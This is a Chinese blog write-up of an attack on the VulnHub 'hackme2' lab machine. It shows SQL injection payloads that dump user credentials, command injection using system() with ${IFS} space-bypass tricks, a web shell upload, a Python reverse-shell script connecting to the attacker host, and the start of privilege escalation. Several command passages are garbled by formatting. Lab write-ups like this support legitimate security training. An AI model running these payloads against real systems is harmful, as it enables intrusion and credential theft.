靶机hackme2

已于 2023-06-13 09:29:12 修改
阅读量109 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 靶机 文章标签: 数学建模
于 2023-06-12 15:29:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58602402/article/details/131167657

靶机-hackme2

环境搭建

靶机下载

https://vulnhub.com/entry/hackme-2,618/
攻击机kali:192.168.12.144
靶机:192.168.12.163

一、信息收集

  1. 主机发现
namp 192.168.12.1/24


2.发现端口80,22端口开放;对80端口进行访问
在这里插入图片描述
3.对站点目录进行扫描

dirsearch -u "http://192.168.12.163/"

在这里插入图片描述
在这里插入图片描述
4.网站指纹识别

whatweb http://192.168.12.163

在这里插入图片描述

二、漏洞挖掘

1.通过注册登录进入
在这里插入图片描述
2.可能存在sql注入,用sqlmap失败,进行手工注入

输入:
L -->返回信息 猜测这里存在模糊查询
Linux%’ and ‘123’ like '1 ->成功返回信息

3.构造payload进行注入,爆破数据库

Linux%'/**/union/**/select/**/database/**/(),'2','3
发现数据库:webapp

在这里插入图片描述
4.继续爆破表名,字段名,字段内的数据

表名:Linux%'/**/union/**/select/**/group_concat(table_name),"2","3"/**/from/**/information_schema.tables/**/where/**/table_schema/**/like'webapp
字段名:
Linux%'/**/union/**/select/**/group_concat(column_name),"2","3"/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'users
字段内数据:
Linux%'/**/union/**/select/**/group_concat(user),'2',group_concat(pasword)/**/from/**/users/**/where/**/1/**/like'

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5.根据上面获取的用户密码,利用前面md5破解网站破解密码

用户:superadmin
密码:2386acb2cf356944177746fc92523983
破解:Uncrackable

在这里插入图片描述
6.利用破解的密码,进行登录
在这里插入图片描述
7.进行文件上传漏洞的尝试

直接上传木马文件 ----》失败
修改后缀为jpg —>访问失败–蚁剑连接不上
上传的jpg,利用bp进行修改后缀,上传显示成功,页面访问失败

在这里插入图片描述
8.尝试命令注入漏洞

在这里插入图片描述
9.填写数据,利用bp抓包,修改数据

system(‘ls’)

在这里插入图片描述
在这里插入图片描述
10.查看文件上传php文件

cat${IFS}welcomeadmin.php
文件上传的路径为:/var/www/html/uploads/year2020/
在这里插入图片描述

命令执行中空格绕过方法

< --> 重定向,如cat<flag.php
<> --> 重定向,如cat<>flag.php
%09 --> 需要php环境,如cat%09flag.php
I F S − − > 单纯 c a t {IFS} --> 单纯cat IFS>单纯catIFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名,如cat${IFS2}flag.php
$IFS 9 − − > 后面加个 9 --> 后面加个 9>后面加个与{}类似,起截断作用, 9 是当前系统 s h e l l 进程第九个参数持有者,始终为空字符串,如 c a t 9是当前系统shell进程第九个参数持有者,始终为空字符串,如cat 9是当前系统shell进程第九个参数持有者,始终为空字符串,如catIFS2$9flag.php

三、漏洞利用

1.结合命令执行漏洞和文件上传漏洞,将前面上传的inj.jpg转换成phin.php文件,再使用蚁剑进行连接

system(‘mv I F S / v a r / w w w / h t m l / u p l o a d s / y e a r 2020 / i n j . j p g {IFS}/var/www/html/uploads/year2020/inj.jpg IFS/var/www/html/uploads/year2020/inj.jpg{IFS}/var/www/html/uploads/year2020/phin.php’)

访问页面
在这里插入图片描述
蚁剑进行连接
在这里插入图片描述
2.利用脚本,通过蚁剑上传执行

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“192.168.12.144”,8989))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/bash”,“-i”])

3.kali开启监听

nc -lvvp 8989

在这里插入图片描述

四、提权

1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件
在这里插入图片描述

Vulnhub靶机hackme2-DHCP
qq_48904485的博客
02-01 1065
运行环境:Virtualbox(攻击机)和VMware(靶机)攻击机:kali(192.168.56.106)靶机hackme2-DHCP(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova。
漏洞payload 靶机_hackme2 靶机攻略
weixin_42354108的博客
01-16 1168
原标题:hackme2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
Hackme-2靶机
zjxxxy的博客
06-12 232
Hackme-2靶场攻略
Hackme2靶机总结
qq_45301512的博客
12-17 503
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
vulnhub----hackme2-DHCP靶机
woshicainiao666的博客
02-26 1099
文件上传+命令执行漏洞结合
hackme靶机渗透流程
wxh的博客
10-25 372
查看表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#先确定mac信息,再搭配主机扫描确定靶机的IP地址。依据上面上传phpinfo的步骤,上传一句话木马。第三个为一个上传页面(没找到上传按钮)登录后发现有搜索框 尝试sql注入。上传后回到该页面 尝试访问。连接成功 拿到shell。查看user表中的数据。尝试上传phpinfo。
渗透Vulnhub-hackme靶机
C-HOWE的博客
01-13 891
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解。
靶机渗透hackme详解(有手就行!)
2301_76631050的博客
07-29 466
虚拟机为NAT模式,根据真实机NAT模式的IP,我们进行端口扫描,扫描出虚拟机的IP为192.168.222.131。可以看到superadmin为超级管理员的意思,但是密码进行了md5加密,我们需要对密码解密,然后登录超级管理员界面。我们并不知道我们的文件被上传到了哪里,所以这里还得需要工具扫描一下他的目录。我们判断可能存在SQL注入,输入 ‘or 1=1# ,发现页面正常。我们上传一个带有一句话木马的文件,看看怎么个事。接下来我们随便输入一下进行抓包,利用sqlmap跑一下看看。
hackme-1靶机渗透详解
大熊
06-12 834
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4442
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
vulnhub靶机hackme(DHCP)渗透测试
Long_gone的博客
12-04 1496
一、扫描 靶机打开后先用攻击机扫描靶机的IP地址: arp-scan 192.168.34.0/24 经过排除,确定靶机IP地址为:192.168.34.154,然后扫描一下靶机的端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,然后再扫描一下80端口的目录: dirb http://192.168.34.154 ...
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 7254
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
Hackme靶机渗透
m0_50584370的博客
06-01 376
hackme靶机渗透
AI“炼金术”:破解绿色水泥的配方密码
haisendashuju的博客
08-04 164
更关键的碳源潜藏于原料本身——石灰石中化学结合的二氧化碳在高温下被无情释放,占据总排放过半。如今,AI驱动的高效“配方炼金术”,正将它的未来调成可持续的绿色。一旦训练完成,AI能在毫秒内评估任意配方的性能与碳排放——效率提升近千倍,如同为材料科学家打造了一台“超算加速器”。“这就像一本‘数字食谱’,”数学家罗曼娜·博伊格描述道,“我们不再盲目测试成千上万种组合,而是直接询问AI:请给我最环保又最坚固的配方。:引入“遗传算法”,模拟自然进化原理,在浩如烟海的组合中锁定同时满足高强度与低碳排的黄金配方。
电力系统分析笔记:发电机与变压器的数学建模与运行状态详解
zxjiaya的博客
08-02 351
本文系统介绍了电力系统中发电机与变压器的数学建模方法及运行状态分析。重点阐述了发电机的感应原理、功率角特性、四象限运行状态及三种数学模型(PV、PQ、Vθ);详细解析了变压器(包括双绕组和三绕组)的T型/π型等效电路模型及参数测定方法(空载试验、短路试验);并讨论了稳态与暂态条件下的电压/功率约束条件。这些建模方法为电力系统潮流计算、稳定性分析和调度运行提供了理论基础。
算法驱动的商业革命:从技术优化到增长引擎的进化之路
最新发布
weixin_37794278的博客
08-04 383
摘要:本文探讨算法如何从技术工具蜕变为商业核心驱动力。通过沃尔玛供应链优化、亚马逊推荐系统等案例,分析算法在业务流程重构、商业模式创新和决策质量提升中的关键作用。研究表明,算法使沃尔玛库存周转率提升22%,亚马逊35%销售额来自推荐系统,Uber空驶率降至15%以下。同时指出算法面临数据依赖、伦理偏见等挑战,提出迁移学习、公平性约束等解决方案。文章强调,未来商业竞争力取决于"算法素养"——组织理解、应用和管理算法的综合能力,最终实现人机协同的商业价值最大化。
数学建模——递归和动态规划
shenghaide_jiahu的博客
08-02 717
这个还得从实际问题出发假设你在商店购物,最后需要用硬币支付,并且每次用的。而你现在有三种面额的硬币,分别是2,5,7例如,假设你买了12块钱的东西.那么可能的方法有:2+5+5,7+5,2*6,由于因此7+5是最好的选择那么怎么求出7+5这个答案呢,如果只有12块钱可能还好,但是假如现在有27块钱,那么可以选的方法就多了,直接枚举肯定行不通。
2025年AI+数模竞赛培训意见征集-最后一轮
qq_33690821的博客
07-31 487
这一观点也是今年组委会给出的观点,据统计84%的学生 正在使用AI,但是72%的学生认为AI应该禁止,这就是我们所说的囚徒困境,即想自己用 用的好,还不想其他人使用。意见1:大部分数学建模参与者其实最大的困难还是思路和代码,写作其实并没有那么大的困难,个人觉得,所以感觉可以针对ai建模和ai代码实现来讲一讲,另外课时感觉不能太多,毕竟本身也是免费的,免费的话很多人不会珍惜,如果可以浓缩成精华,那绝对是最好的,巅峰之作。如果您对我们的课程设计有更多更好的意见 欢迎批评指正,我们会根据大家的需要即时进行订正。
数学建模——多目标规划
shenghaide_jiahu的博客
07-31 609
敏感性分析用于评估模型输出对输入参数变化的敏感程度,广泛应用于金融、工程、项目管理等领域。通过识别关键变量,帮助决策者优化资源分配或降低风险。
hackme靶机通关
12-27
### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞,允许攻击者执行任意SQL查询。对于`hackme2`靶场而言,在存在SQL注入的地方可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值